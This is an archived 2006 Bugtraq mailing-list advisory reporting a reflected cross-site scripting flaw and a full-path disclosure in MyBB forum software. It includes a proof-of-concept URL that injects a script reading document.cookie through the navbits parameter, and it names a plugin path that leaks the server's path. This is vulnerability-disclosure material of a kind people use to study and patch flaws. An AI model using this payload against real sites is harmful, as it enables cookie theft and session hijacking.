MyBB Full path and Cross site scripting vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyBB Full path and Cross site scripting vulnerabilities
From: security@xxxxxxxxx
Date: 15 Sep 2006 03:03:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello

Title : MyBB Full path and Cross site scripting vulnerabilities
Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@xxxxxxxxx

xss
archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

full path
inc/plugins/hello.php

WwW.SoQoR.NeT

Prev by Date: Re: PHP Advanced Transfer Manager v1.20 ; Multiple Remote File Include Vulnerabilities
Next by Date: ppalCart V(2.5 EE) Remote File Inclusion
Previous by thread: Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities
Next by thread: ppalCart V(2.5 EE) Remote File Inclusion
Index(es):
- Date
- Thread